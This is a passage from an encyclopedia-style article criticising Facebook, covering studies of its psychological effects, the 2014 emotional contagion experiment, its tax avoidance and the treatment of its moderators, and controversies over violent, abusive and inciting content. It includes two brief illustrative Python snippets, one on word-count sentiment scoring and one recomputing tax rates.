In June 2018, Children and Youth Services Review published a regression analysis of 283 adolescent Facebook users in the Piedmont and Lombardy regions of Northern Italy (that replicated previous findings among adult users) showing that adolescents reporting higher ADHD symptoms positively predicted Facebook addiction, persistent negative attitudes about the past and that the future is predetermined and not influenced by present actions, and orientation against achieving future goals, with ADHD symptoms additionally increasing the manifestation of the proposed category of psychological dependence known as "problematic social media use."[189]

Self-harm and suicide

In January 2019, both the Health Secretary of the United Kingdom and the Children's Commissioner for England urged Facebook and other social media companies to take responsibility for the risk to children posed by content on their platforms related to self-harm and suicide.[191] The Health Secretary wrote:

Research shows that people who are feeling suicidal use the internet to search for suicide methods. Websites provide graphic details and information on how to take your own life. This cannot be right. Where this content breaches the policies of internet and social media providers it must be removed.

The Children's Commissioner wrote:

I do not think it is going too far to question whether even you, the owners, any longer have any control over [the sites'] content. If that is the case, then children should not be accessing your services at all, and parents should be aware that the idea of any authority overseeing algorithms and content is a mirage.

Envy

Facebook has been criticized for making people envious and unhappy due to the constant exposure to positive yet unrepresentative highlights of their peers. Such highlights include, but are not limited to, journal posts, videos, and photos that depict or reference such positive or otherwise outstanding activities, experiences, and facts. This effect is caused mainly by the fact that most users of Facebook usually only display the positive aspects of their lives while excluding the negative, though it is also strongly connected to inequality and the disparities between social groups as Facebook is open to users from all classes of society. Sites such as AddictionInfo.org[192] state that this kind of envy has profound effects on other aspects of life and can lead to severe depression, self-loathing, rage and hatred, resentment, feelings of inferiority and insecurity, pessimism, suicidal tendencies and desires, social isolation, and other issues that can prove very serious. This condition has often been called "Facebook Envy" or "Facebook Depression" by the media.[193][194][195][196][197][198]

A joint study conducted by two German universities documented Facebook envy and found that as many as one out of three people felt worse and less satisfied with their lives after visiting the site. Vacation photos were found to be the most common source of feelings of resentment and jealousy. Social interaction was the second-biggest cause of envy, as Facebook users compare the number of birthday greetings, likes, and comments they receive with those of their friends. Visitors who contributed the least tended to feel the worst. "According to our findings, passive following triggers invidious emotions, with users mainly envying happiness of others, the way others spend their vacations; and socialize," the study states.[199]

A 2013 study by researchers at the University of Michigan found that the more people used Facebook, the worse they felt afterwards.[200]

One study states that narcissistic users who display excessive grandiosity evoke negative emotions in viewers and cause envy, which may in turn leave viewers feeling lonely. Viewers sometimes terminate relationships with such users to avoid these negative emotions, but this avoidance itself acts as reinforcement and may deepen the loneliness, creating a vicious circle of loneliness and avoidance coping.[201]

Divorce

Social networks like Facebook can have a detrimental effect on marriages, with users becoming worried about their spouse's contacts and relations with other people online, leading to marital breakdown and divorce.[202] According to a 2009 survey in the UK, around 20 percent of divorce petitions included references to Facebook.[203][204][205][206] Facebook has provided a new platform for interpersonal communication, and researchers have proposed that high levels of Facebook use could result in Facebook-related conflict and breakup or divorce.[207] Previous studies have shown that romantic relationships can be damaged by excessive Internet use, Facebook jealousy, partner surveillance, ambiguous information, and online portrayal of intimate relationships.[208][209][210][211][212] Excessive Internet users reported having greater conflict in their relationships; their partners felt neglected, and the relationships showed lower commitment and lower feelings of passion and intimacy. According to the article, researchers suspect that Facebook may contribute to an increase in divorce and infidelity rates in the near future due to the amount and ease of accessibility to connect with past partners.[207]

Stress

Research performed by psychologists from Edinburgh Napier University indicated that Facebook adds stress to users' lives. Causes of stress included fear of missing important social information, fear of offending contacts, discomfort or guilt from rejecting user requests or deleting unwanted contacts or being unfriended or blocked by Facebook friends or other users, the displeasure of having friend requests rejected or ignored, the pressure to be entertaining, criticism or intimidation from other Facebook users, and having to use appropriate etiquette for different types of friends.[213] Many people who started using Facebook for positive purposes or with positive expectations have found that the website has negatively impacted their lives.[214]

In addition, the increasing number of messages and social relationships embedded in SNS increases the amount of social information demanding a reaction from SNS users. Consequently, SNS users may perceive that they are giving too much social support to other SNS friends. This dark side of SNS usage is called "social overload". It is caused by the extent of usage, number of friends, subjective social support norms, and type of relationship (online-only vs. offline friends), while age has only an indirect effect. The psychological and behavioral consequences of social overload include perceptions of SNS exhaustion, low user satisfaction, and high intentions to reduce or stop using SNS.[215]

Narcissism

In July 2018, a meta-analysis published in Psychology of Popular Media found that grandiose narcissism positively correlated with time spent on social media, frequency of status updates, number of friends or followers, and frequency of posting self-portrait digital photographs,[216] while a meta-analysis published in the Journal of Personality in April 2018 found that the positive correlation between grandiose narcissism and social networking service usage was replicated across platforms (including Facebook).[217] In March 2020, the Journal of Adult Development published a regression discontinuity analysis of 254 Millennial Facebook users investigating differences in narcissism and Facebook usage between the age cohorts born from 1977 to 1990 and from 1991 to 2000 and found that the later born Millennials scored significantly higher on both.[218] In June 2020, Addictive Behaviors published a systematic review finding a consistent, positive, and significant correlation between grandiose narcissism and the proposed category of psychological dependence called "problematic social media use".[219] Also in 2018, social psychologist Jonathan Haidt and FIRE President Greg Lukianoff noted in The Coddling of the American Mind that former Facebook president Sean Parker stated in a 2017 interview that the Like button was consciously designed to prime users receiving likes to feel a dopamine rush as part of a "social-validation feedback loop".[220]

Non-informing, knowledge-eroding medium

Facebook has, at least in the political field, a counter-effect on being informed: in two studies from the US with a total of more than 2,000 participants, the influence of social media on general knowledge of political issues was examined in the context of two US presidential elections. The results showed that the frequency of Facebook use was moderately negatively related to general political knowledge, even after accounting for demographic and political-ideological variables and previous political knowledge. According to the latter study, this indicates a causal relationship: the higher the Facebook use, the more general political knowledge declines.[221] In 2018, social psychologist Jonathan Haidt and FIRE President Greg Lukianoff argued in The Coddling of the American Mind that the filter bubbles created by the News Feed algorithm of Facebook and other platforms are one of the principal factors amplifying political polarization in the United States since 2000 (when a majority of U.S. households first had at least one personal computer and then internet access the following year),[222][223] and Haidt and Tobias Rose-Stockwell suggested in The Atlantic in December 2019 that increased support in the United States among Millennials and Generation Z for communism and socialism stems from ignorance about the economic history of the 20th century.[224][225][226]

Other psychological effects

Many students have admitted to experiencing bullying on the site, which can lead to psychological harm. High school students face the possibility of bullying and other adverse behavior over Facebook every day. Many studies have attempted to discover whether Facebook has a positive or negative effect on children's and teenagers' social lives, and many of them have come to the conclusion that there are distinct social problems that arise with Facebook usage. British neuroscientist Susan Greenfield drew attention to the issues that children encounter on social media sites. She said that social media can rewire the brain, which caused some hysteria over whether or not social networking sites are safe. She did not back up her claims with research, but her remarks did prompt quite a few studies on the subject. When a user's online self is broken down by others through badmouthing, criticism, harassment, criminalization or vilification, intimidation, demonization, demoralization, belittlement, or attacks over the site, it can cause envy, anger, or depression.[227][228][229][230]

Sherry Turkle, in her book Alone Together: Why We Expect More from Technology and Less from Each Other, argues that social media brings people closer and further apart at the same time. One of the main points she makes is that there is a high risk of treating people online with dispatch, as if they were objects. Although people are networked on Facebook, their expectations of each other tend to be lessened. According to Turkle, this could cause a feeling of loneliness in spite of being together.[231]

Between 2016 and 2018, the number of 12- to 15-year-olds who reported being bullied over social media rose from 6% to 11% in the United Kingdom, the area covered by Ofcom.[191]

User influence experiments

Academic and Facebook researchers have collaborated to test whether the messages people see on Facebook can influence their behavior. For instance, in "A 61-Million-Person Experiment in Social Influence and Political Mobilization," during the 2010 elections, Facebook users were given the opportunity to "tell your friends you voted" by clicking on an "I voted" button. Users were 2% more likely to click the button if it was associated with friends who had already voted.[232]

Much more controversially, a 2014 study of "Emotional Contagion Through Social Networks" manipulated the balance of positive and negative messages seen by 689,000 Facebook users.[233] The researchers concluded that they had found "some of the first experimental evidence to support the controversial claims that emotions can spread throughout a network, [though] the effect sizes from the manipulations are small."[234]

Unlike the "I voted" study, which had presumptively beneficial ends and raised few concerns, this study was criticized for both its ethics and methods/claims. As controversy about the study grew, Adam Kramer, a lead author of both studies and member of the Facebook data team, defended the work in a Facebook update.[235] A few days later, Sheryl Sandburg, Facebook's COO, made a statement while traveling abroad. While at an Indian Chambers of Commerce event in New Delhi she stated that "This was part of ongoing research companies do to test different products, and that was what it was. It was poorly communicated and for that communication we apologize. We never meant to upset you."[236]

Shortly thereafter, on July 3, 2014, USA Today reported that the privacy watchdog group Electronic Privacy Information Center (EPIC) had filed a formal complaint with the Federal Trade Commission claiming that Facebook had broken the law when it conducted the study on the emotions of its users without their knowledge or consent. In its complaint, EPIC alleged that Facebook had deceived users by secretly conducting a psychological experiment on their emotions: "At the time of the experiment, Facebook did not state in the Data Use Policy that user data would be used for research purposes. Facebook also failed to inform users that their personal information would be shared with researchers."[237]

Beyond the ethical concerns, other scholars criticized the methods and reporting of the study's findings. John Grohol, writing for Psych Central, argued that despite its title and claims of "emotional contagion," the study did not look at emotions at all. Instead, its authors used an application (called "Linguistic Inquiry and Word Count" or LIWC 2007) that simply counted positive and negative words to infer users' sentiments. He wrote that a shortcoming of the LIWC tool is that it does not understand negations. Hence, a status update such as "I am not happy" would be scored as positive: "Since the LIWC 2007 ignores these subtle realities of informal human communication, so do the researchers." Grohol concluded that given these subtleties, the effect size of the findings is little more than a "statistical blip."

Kramer et al. (2014) found a 0.07%—that's not 7 percent, that's 1/15th of one percent!!—decrease in negative words in people's status updates when the number of negative posts on their Facebook news feed decreased. Do you know how many words you'd have to read or write before you've written one less negative word due to this effect? Probably thousands.[238]
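To make the objection concrete, the following is a minimal sketch of the kind of negation-blind word counting Grohol describes; it is not the actual LIWC 2007 tool, and the word lists are illustrative placeholders, but it shows how a status such as "I am not happy" ends up scored as positive.

```python
# Illustrative sketch only: a negation-blind word counter, NOT the real LIWC 2007.
# The word lists below are made up for demonstration purposes.

POSITIVE_WORDS = {"happy", "great", "good", "love"}
NEGATIVE_WORDS = {"sad", "awful", "bad", "hate"}

def naive_sentiment(status: str) -> int:
    """Return (#positive words - #negative words), ignoring context such as negation."""
    score = 0
    for word in status.lower().split():
        if word in POSITIVE_WORDS:
            score += 1
        elif word in NEGATIVE_WORDS:
            score -= 1
    return score

# "I am not happy" contains the positive word "happy" and no negative words,
# so a counter that ignores the negation scores it as positive.
print(naive_sentiment("I am not happy"))   # 1  -> treated as a "positive" status
print(naive_sentiment("I hate mondays"))   # -1 -> treated as a "negative" status
```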

The consequences of the controversy are pending (be they FTC or court proceedings), but it did prompt an "Editorial Expression of Concern" from its publisher, the Proceedings of the National Academy of Sciences, as well as a blog posting from OkCupid titled "We experiment on human beings!"[239] In September 2014, law professor James Grimmelmann argued that the actions of both companies were "illegal, immoral, and mood-altering" and filed notices with the Maryland Attorney General and Cornell Institutional Review Board.[240]

In the UK, the study was also criticized by the British Psychological Society which said, in a letter to The Guardian, "There has undoubtedly been some degree of harm caused, with many individuals affected by increased levels of negative emotion, with consequent potential economic costs, increase in possible mental health problems and burden on health services. The so-called 'positive' manipulation is also potentially harmful."[241]

Tax avoidance

Facebook uses a complicated series of shell companies in tax havens to avoid paying billions of dollars in corporate tax.[242] According to The Express Tribune, Facebook is among the corporations that "avoided billions of dollars in tax using offshore companies."[243] For example, Facebook routes billions of dollars in profits using the Double Irish and Dutch Sandwich tax avoidance schemes to bank accounts in the Cayman Islands. The Dutch newspaper NRC Handelsblad concluded from the Paradise Papers published in late 2017 that Facebook pays "practically no taxes" worldwide.[244]

For example, Facebook paid:

  • In 2011, £2.9m tax on £840m profits in the UK;
  • In 2012 and 2013 no tax in the UK;
  • In 2014 £4,327 tax on hundreds of millions of pounds in UK revenues which were transferred to tax havens.[245]

According to Paul Tang, an economist and member of the PvdA delegation within the Progressive Alliance of Socialists & Democrats (S&D) in the European Parliament, between 2013 and 2015 the EU lost an estimated €1,453m to €2,415m in tax revenue to Facebook.[246] Compared with countries outside the EU, the EU taxed Facebook at a rate of only 0.03% to 0.1% of its revenue (around 6% of its EBT), whereas this rate is near 28% in countries outside the EU. Even if a rate of between 2% and 5% had been applied during this period, as suggested by the ECOFIN Council, avoidance of tax at that rate would have meant a loss to the EU of between €327m and €817m.[246]

Revenues, profits, tax and effective tax rates, Facebook Inc. 2013–2015.[246]

Year | Scope             | Revenue (m EUR) | EBT (m EUR) | Tax (m EUR) | Tax / EBT | Tax / Revenue
2013 | Total             | 5,720           | 2,001       | 911         | 46%       | 15.93%
2013 | EU                | 3,069           | (4)         | 3           | n.a.      | 0.10%
2013 | Rest of the world | 2,651           | 2,005       | 908         | 45%       | 34.25%
2014 | Total             | 10,299          | 4,057       | 1,628       | 40%       | 15.81%
2014 | EU                | 5,017           | (20)        | 5           | n.a.      | 0.09%
2014 | Rest of the world | 5,282           | 4,077       | 1,623       | 40%       | 30.73%
2015 | Total             | 16,410          | 5,670       | 2,294       | 40%       | 13.98%
2015 | EU                | 8,253           | (43)        | 3           | 6%        | 0.03%
2015 | Rest of the world | 8,157           | 5,627       | 2,291       | 41%       | 28.09%
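As a rough check on how the table's rate columns are derived, the sketch below recomputes the 2015 "Total" and "Rest of the world" effective rates from the amounts above (the EU rows follow the same formula, but their tax figures of only a few million euros make the rounded percentages more sensitive).

```python
# Recomputes the effective-rate columns of the table above from its 2015 figures.
# Amounts are in millions of euros, as reported in Tang's analysis.[246]

rows_2015 = {
    "Total":             {"revenue": 16_410, "ebt": 5_670, "tax": 2_294},
    "Rest of the world": {"revenue": 8_157,  "ebt": 5_627, "tax": 2_291},
}

for scope, r in rows_2015.items():
    tax_over_ebt = r["tax"] / r["ebt"]          # effective rate on pre-tax profit
    tax_over_revenue = r["tax"] / r["revenue"]  # effective rate on revenue
    print(f"{scope:18s} Tax/EBT = {tax_over_ebt:.0%}   Tax/Revenue = {tax_over_revenue:.2%}")

# Output matches the table:
#   Total              Tax/EBT = 40%   Tax/Revenue = 13.98%
#   Rest of the world  Tax/EBT = 41%   Tax/Revenue = 28.09%
```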

On July 6, 2016, the U.S. Department of Justice filed a petition in the U.S. District Court in San Francisco, asking for a court order to enforce an administrative summons issued to Facebook, Inc., under Internal Revenue Code section 7602,[247] in connection with an Internal Revenue Service examination of Facebook's year 2010 U.S. Federal income tax return.[248][249]

In November 2017, the Irish Independent recorded that for the 2016 financial year, Facebook had paid €30 million of Irish corporation tax on €12.6 billion of revenues that were routed through Ireland, giving an Irish effective tax rate of under 1%.[250] The €12.6 billion of 2016 Facebook revenues routed through Ireland was almost half of Facebook's global revenues.[251] In April 2018, Reuters wrote that all of Facebook's non–U.S. accounts were legally housed in Ireland for tax purposes, but were being moved due to the May 2018 EU GDPR regulations.[252]

In November 2018, the Irish Times reported that Facebook routed over €18.7 billion of revenues through Ireland (almost half of all its global revenues), on which it paid €38 million of Irish corporation tax.[253]

Treatment of employees and contractors

Moderators

Facebook hires some employees through contractors, including Accenture, Arvato, Cognizant, CPL Resources, and Genpact, to serve as content moderators, reviewing potentially problematic content posted to both Facebook and Instagram.[258] Many of these contractors face unrealistic expectations, harsh working conditions, and constant exposure to disturbing content, including graphic violence, animal abuse, and child pornography.[254][255] Contractor employment is contingent on achieving and maintaining a score of 98 on a 100-point scale on a metric known as "accuracy". Falling below a score of 98 can result in dismissal. Some have reported posttraumatic stress disorder (PTSD) stemming from lack of access to counseling, coupled with unforgiving expectations and the violent content they are assigned to review.[254]

Content moderator Keith Utley, who was employed by Cognizant, experienced a heart attack during work in March 2018; the office lacked a defibrillator, and Utley was transported to a hospital where he died.[256][259] Selena Scola, an employee of contractor Pro Unlimited, Inc., sued her employer after she developed PTSD as a result of "constant and unmitigated exposure to highly toxic and extremely disturbing images at the workplace".[260] In December 2019, former Cpl employee Chris Gray began legal action in the High Court of Ireland, claiming damages for PTSD suffered as a moderator,[261] the first of an estimated 20+ pending cases. In February 2020, employees in Tampa, Florida filed a lawsuit against Facebook and Cognizant alleging they developed PTSD and related mental health impairments as a result of constant and unmitigated exposure to disturbing content.[262]

In February 2020, European Union Commissioners criticized Facebook's plans for dealing with the working conditions of those contracted to moderate content on the social media platform.[263]

Facebook agreed to settle a class action lawsuit for $52 million on May 12, 2020, which included a $1,000 payment to each of the 11,250 moderators in the class, with additional compensation available for the treatment of PTSD and other conditions resulting from the jobs.[264][265][266]

Employees

Plans for a Facebook-owned real estate development known as "Willow Village" have been criticized for resembling a "company town", which often curtails the rights of residents, and encourages or forces employees to remain within an environment created and monitored by their employer outside of work hours.[267] Critics have referred to the development as "Zucktown" and "Facebookville" and the company has faced additional criticism for the effect it will have on existing communities in California.

Misleading campaign against Google

In May 2011, emails were sent to journalists and bloggers making critical allegations about Google's privacy policies; however, it was later discovered that the anti-Google campaign, conducted by PR giant Burson-Marsteller, was paid for by Facebook in what CNN referred to as "a new level of skullduggery" and which The Daily Beast called a "clumsy smear". While taking responsibility for the campaign, Burson-Marsteller said it should not have agreed to keep its client's (Facebook's) identity a secret. "Whatever the rationale, this was not at all standard operating procedure and is against our policies, and the assignment on those terms should have been declined", it said in a statement.[268]

Content

An example of a Facebook post censored due to an unspecified conflict with "Community Standards".
Error message generated by Facebook for an attempt to share a link to a website that is censored due to Community Standards in a private chat. Messages containing certain links will not be delivered to the recipient.

Facebook has been criticized for removing or allowing various content (posts, photos and entire groups and profiles).

Intellectual property infringement

Facebook has also been criticized for lax enforcement of third-party copyrights for videos uploaded to the service. In 2015, some Facebook pages were accused of plagiarizing videos from YouTube users and re-posting them as their own content using Facebook's video platform, in some cases achieving higher levels of engagement and views than the original YouTube post. Videos hosted by Facebook are given higher priority and prominence within the platform and its user experience (including direct embedding within the News Feed and pages), placing posts that merely link to the original external source at a disadvantage.[269][270] In August 2015, Facebook announced a video-matching technology aiming to identify reposted videos, and also stated its intention to improve its procedures to remove infringing content faster.[271] In April 2016, Facebook implemented a feature known as "Rights Manager", which allows rights holders to manage and restrict the upload of their content onto the service by third parties.[272]

Violent content

In 2013, Facebook was criticized for allowing users to upload and share videos depicting violent content, including clips of people being decapitated. Having previously refused to delete such clips under the guideline that users have the right to depict the "world in which we live", Facebook changed its stance in May, announcing that it would remove reported videos while evaluating its policy.[273] The following October, Facebook stated that it would allow graphic videos on the platform, as long as the intention of the video was to "condemn, not glorify, the acts depicted",[274] further stating that "Sometimes, those experiences and issues involve graphic content that is of public interest or concern, such as human rights abuses, acts of terrorism, and other violence. When people share this type of graphic content, it is often to condemn it. If it is being shared for sadistic pleasure or to celebrate violence, Facebook removes it."[275] However, Facebook once again received criticism, with the Family Online Safety Institute saying that such videos "crossed a line" and can potentially cause psychological damage among young Facebook users,[274] and then-Prime Minister of the United Kingdom David Cameron calling the decision "irresponsible", citing the same concerns regarding young users.[275] Two days later, Facebook removed a video of a beheading following "worldwide outrage", and while acknowledging its commitment to allowing people to upload gory material for the purpose of condemnation, it also stated that it would be further strengthening its enforcement to prevent glorification.[275] The company's policies were also criticized as part of these developments, with some drawing particular attention to Facebook's permission of graphic content but potential removal of breastfeeding images.[276] In January 2015, Facebook announced that new warnings would be displayed on graphic content, requiring users to explicitly confirm that they wish to see the material.[277][278]

War crimes

Facebook has been criticized for failing to take down violent content depicting war crimes in Libya. A 2019 investigation by the BBC[279] found evidence of alleged war crimes in Libya being widely shared on Facebook and YouTube. The BBC found images and videos on social media of the bodies of fighters and civilians being desecrated by fighters from the self-styled Libyan National Army. The force, led by General Khalifa Haftar, controls a swathe of territory in the east of Libya and is trying to seize the capital, Tripoli. BBC Arabic found almost one hundred images and videos from Libya shared on Facebook and YouTube in violation of the companies' guidelines.[280] The UK Foreign Office said it took the allegations extremely seriously and was concerned about the impact the recent violence was having on the civilian population.

In 2017, a Facebook video of Libyan National Army (LNA) special forces commander Mahmoud al-Werfalli was uploaded, showing him shooting dead three captured fighters. The video was then shared on YouTube over ten thousand times. The International Criminal Court used it as evidence to indict al-Werfalli for the war crime of murder.[281] The BBC found the original video was still on Facebook two years after his indictment and also discovered videos showing the bodies of civilians being desecrated. These were taken in Ganfouda, a district of Benghazi which was under siege by the LNA between 2016 and 2017. More than 300 people, including dozens of children, died during the siege. A video uncovered by BBC Arabic showed soldiers mocking a pile of corpses of dead civilians and trampling on bodies. Among them was a 77-year-old woman, Alia Hamza. Her son, Ali Hamza, had five family members killed in Ganfouda.

Ali Hamza told BBC Arabic, "I sent links to lawyers to send to the ICC in The Hague against Khalifa Haftar and his military commanders regarding the massacres of civilians." In the video, the LNA soldiers label the civilians as terrorists. Human rights lawyer and war crimes specialist Rodney Dixon QC reviewed the evidence BBC Arabic found: "If groups are using those platforms to propagate their campaigns then those platforms should seriously look at their role because they could then be assisting in that process of further crimes being committed," he said. After the BBC presented its findings to Facebook, the company removed all the videos that showed a suspected war crime taking place, but opted not to suspend any of the accounts the BBC found linked to the images. Erin Saltman, Facebook's policy manager for counterterrorism in Europe, the Middle East and Africa, told BBC Arabic, "Sometimes there are very conflicting narratives of whether or not the victim is a terrorist, or whether it's a civilian over who's committing that act, we cannot be the pure arbiters of truth."[280] However, Facebook's and YouTube's own community guidelines explicitly prohibit content that promotes or depicts acts of violence.[282]

Facebook Live

Facebook Live, introduced in August 2015 for celebrities[283] and gradually rolled out for regular users starting in January 2016,[284][285] lets users broadcast live videos, with Facebook's intention for the feature to be presenting public events or private celebrations.[286] However, the feature has been used to record multiple crimes, deaths, and violent incidents, causing significant media attention.[287][288][289][290][291][292][293][294]

Facebook has received criticism for not removing videos faster,[295] and Facebook Live has been described as a "monster [Facebook] cannot tame"[296] and "a gruesome crime scene for murders".[297] In response, CEO Mark Zuckerberg announced in May 2017 that the company would hire 3,000 people to review content and invest in tools to remove videos faster.[298][299][300]

Pro-anorexia groups

In 2008, Facebook was criticized for hosting groups dedicated to promoting anorexia. The groups promoted dramatic weight loss programs, shared extreme diet tips, and posted pictures of emaciated girls under "Thinspiration" headlines. Members reported having switched to Facebook from Myspace, another social networking service, due to a perceived higher level of safety and intimacy at Facebook.[301] In a statement to BBC News, a Facebook spokesperson stated that "Many Facebook groups relate to controversial topics; this alone is not a reason to disable a group. In cases where content is reported and found to violate the site's terms of use, Facebook will remove it."[302]

Pro-mafia groups' case

In Italy in 2009, the discovery of pro-mafia groups, one of them claiming Bernardo Provenzano's sainthood, caused an alert in the country[303][304][305] and prompted the government to rapidly issue a law that would force Internet service providers to deny access to entire websites in case of refused removal of illegal content. The amendment was passed by the Italian Senate and needed to be passed unchanged by the Chamber of Deputies to become effective.[306][307][308]

Facebook criticized the government's efforts, telling Bloomberg that it "would be like closing an entire railway network just because of offensive graffiti at one station", and that "Facebook would always remove any content promoting violence and already had a takedown procedure in place."[309]

Trolling

On March 31, 2010, The Today Show ran a segment detailing the deaths of three separate adolescent girls and trolls' subsequent reactions to their deaths. Shortly after the suicide of high school student Alexis Pilkington, anonymous posters began trolling for reactions across various message boards, referring to Pilkington as a "suicidal CUSS", and posting graphic images on her Facebook memorial page. The segment also included an exposé of a 2006 accident, in which an eighteen-year-old student out for a drive fatally crashed her father's car into a highway pylon; trolls emailed her grieving family the leaked pictures of her mutilated corpse.[310]

There have been cases where Facebook "trolls" were jailed for their communications on Facebook, particularly on memorial pages. In autumn 2010, Colm Coss of Ardwick, Britain, was sentenced to 26 weeks in jail under section 127 of the UK Communications Act 2003,[311] for "malicious communications" after leaving messages deemed obscene and hurtful on Facebook memorial pages.[312][313]

In April 2011, Bradley Paul Hampson was sentenced to three years in jail after pleading guilty to two counts of using a carriage service (the Internet) to cause offense, for posts on Facebook memorial pages, and one count each of distributing and possessing child pornography when he posted images on the memorial pages of the deceased with phalluses superimposed alongside phrases such as "Woot I'm dead".[314][315]

Rape pages

Pro-rape and 'rape joke' content on Facebook drew attention from the media and women's groups.[316] Rape Is No Joke (RINJ), a group opposing the pages, argued that removing "pro-rape" pages from Facebook and other social media was not a violation of free speech in the context of Article 19 of the Universal Declaration of Human Rights and the concepts recognized in international human rights law in the International Covenant on Civil and Political Rights.[317] RINJ repeatedly challenged Facebook to remove the rape pages,[318] and then turned to advertisers on Facebook, asking them not to let their advertising be posted on Facebook's 'rape pages'.[319]

Following a campaign involving Women, Action and the Media, the Everyday Sexism Project and the activist Soraya Chemaly, who were among 100 advocacy groups, Facebook agreed to update its policy on hate speech. The campaign highlighted content that promoted domestic and sexual violence against women, generated over 57,000 tweets and more than 4,900 emails, and led to outcomes such as the withdrawal of advertising from Facebook by 15 companies, including Nissan UK, House of Burlesque and Nationwide UK. The social media website initially responded by stating that "While it may be vulgar and offensive, distasteful content on its own does not violate our policies",[320] but then agreed to take action on May 29, 2013, after it had "become clear that our systems to identify and remove hate speech have failed to work as effectively as we would like, particularly around issues of gender-based hate".[321]

Child abuse images

In June 2015, the UK National Society for the Prevention of Cruelty to Children raised concerns about Facebook's apparent refusal when asked to remove controversial video material which allegedly showed a baby in emotional distress.[322]

In March 2017, BBC News reported in an investigation that Facebook only removed 18 of the 100 groups and posts it had reported for containing child exploitation images. The BBC had been granted an interview with Facebook policy director Simon Milner under the condition that they provide evidence of the activity. However, when presented with the images, Facebook canceled the interview, and told the BBC that it had been reported to the National Crime Agency for illegally distributing child exploitation images (the NCA could not confirm whether the BBC was actually being investigated).[323] Milner later stated to the BBC that the investigation had exposed flaws in its image moderation process that have since been addressed, and that all of the reported content was removed from the service.[324]

Objectification of women

In July 2017, GMA News reported that "a number" of secret Facebook groups that had been engaging in illegal activity of sharing "obscene" photos of women had been exposed, with the Philippine National Bureau of Investigation warning group members of the possibility of being liable for violating child pornography and anti-voyeurism laws. Facebook stated that it would remove the groups as violations of its community guidelines.[325] A few days later, GMA News had an interview with one of the female victims targeted by one of the groups, who stated that she received friend requests from strangers and inappropriate messages. After reporting to authorities, the Philippine National Police's anti-cybercrime unit promised to take action in finding the accounts responsible.[326] Senator Risa Hontiveros responded to the incidents with the proposal of a law that would impose "stiff penalties" on such group members, stating that "These people have no right to enjoy our internet freedom only to abuse our women and children. We will not allow them to shame our young women, suppress their right to express themselves through social media and contribute to a culture of misogyny and hate".[327]

Anti-Semitism

Facebook has been suspected of having a double standard when it comes to pages and posts regarding the Arab–Israeli conflict. When it comes to alleged incitement, Facebook has been accused of being unfair, removing only posts and pages that attack Palestinians, while turning a blind eye to similar posts that are violently anti-Semitic. The NGO Shurat Hadin-Israel Law Center conducted an experiment on the incitement issue, seeking to expose what it viewed as a double standard regarding anti-Israel sentiment by simultaneously launching two Facebook pages: "Stop Palestinians" and "Stop Israel". Following the launch of the two nearly identical pages, the NGO posted hateful content simultaneously on both. Shurat Hadin then reported both faux-incitement pages to Facebook to see which, if either, would be removed. According to the NGO, despite featuring nearly identical content, only one was removed from the platform: the page inciting against Palestinians was closed by Facebook (on the same day that it was reported) for "containing credible threat of violence" which "violated our [Facebook's] community standards", but not the page inciting against Israelis. Shurat Hadin said that Facebook claimed this page was "not in violation of Facebook's rules". Shurat Hadin's staged anti-Israel group "Stop Israel" remained active on Facebook.[328] ProPublica stated in September 2017 that a website was able to target ads at Facebook users who were interested in "how to burn Jew" and "Jew hater". Facebook removed the categories and said it would try to stop them from appearing to potential advertisers.[329]

In March 2019, Facebook subsidiary Instagram declined to remove an anti-Semitic image posted by right-wing conspiracy theorist Alex Jones, saying that it did not violate their community standards.[330]

Incitement of violence against Israelis

Facebook has been accused of being a public platform that is used to incite violence. In October 2015, 20,000 Israelis claimed that Facebook was ignoring Palestinian incitement on its platform and filed a class-action suit demanding that Facebook remove all posts "containing incitement to murder Jews".[331]

Israeli politicians have complained that Facebook does not comply or assist with requests from the police for tracking and reporting individuals when they share their intent to kill or commit any other act of violence on their Facebook pages. In June 2016, following the murder of Hallel Ariel, 13, by a terrorist who posted on Facebook, Israeli Minister of Public Security Gilad Erdan charged that "Facebook, which has brought a positive revolution to the world, has become a monster...The dialogue, the incitement, the lies of the young Palestinian generation are happening on the Facebook platform." Erdan accused Facebook of "sabotaging the work of Israeli police" and "refusing to cooperate" when Israel Police turns to the site for assistance. It also "sets a very high bar" for removing inciteful content.[332]

In July 2016, a civil action for $1 billion in damages was filed in the United States District Court for the Southern District of New York on behalf of the victims and family members of four Israeli-Americans and one US citizen killed by Hamas militants since June 2014.[333][334] The victims and plaintiffs in the case are the families of Yaakov Naftali Fraenkel, a 16-year-old who was kidnapped and murdered by Hamas operatives in 2014; Taylor Force, a 29-year-old American MBA student and US Army veteran killed in a stabbing spree in Jaffa in 2016; Chaya Braun, a three-month-old thrown from her stroller and slammed into the pavement when a Hamas attacker drove his car into a light rail station in Jerusalem in October 2014; 76-year-old Richard Lakin, who was killed in the October 2015 shooting and stabbing attack on a Jerusalem bus; and Menachem Mendel Rivkin, who was seriously wounded in a January 2016 stabbing attack in Jerusalem.[334] The plaintiffs claimed that Facebook knowingly provided its social media platform and communication services to Hamas in violation of provisions of US anti-terrorism laws, which prohibit US businesses from providing any material support, including services, to designated terrorist groups and their leaders. The government of the United States has designated Hamas as a "Foreign Terrorist Organization" as defined by US law. The suit claims that Hamas "used and relied on Facebook's online social network platform and communications services to facilitate and carry out its terrorist activity, including the terrorist attacks in which Hamas murdered and injured the victims and their families in this case".[333][334] The legal claim was rejected; the court found that Facebook and other social media companies are not considered to be the publishers of material users post when digital tools used by the company match content with what the tool identifies as interested consumers.[335][336]

In August 2016, Israel's security service, the Shin Bet, reported that it had arrested nine Palestinians who had been recruited by the Lebanon-based Hezbollah terrorist organization. Operatives of Hezbollah in Lebanon and Gaza Strip recruited residents of the West Bank, Gaza and Israel through Facebook and other social media sites. After recruiting cell leaders on Facebook, Hezbollah and the recruits used encrypted communications to avoid detection, and the leaders continued to recruit other members. The terror cells received Hezbollah funding and planned to conduct suicide bombings and ambushes and had begun preparing explosive devices for attacks, said the security service, which claimed credit for preventing the attacks. The Shin Bet said it also detected multiple attempts by Hezbollah to recruit Israeli Arabs through a Facebook profile.[337][338][339]

Legislation is being prepared in Israel that would allow fines of 300,000 shekels for Facebook and other social media such as Twitter and YouTube for every post that incites or praises terrorism, could possibly lead to further acts of terrorism, and is not removed within 48 hours.[340]

Countermeasure efforts

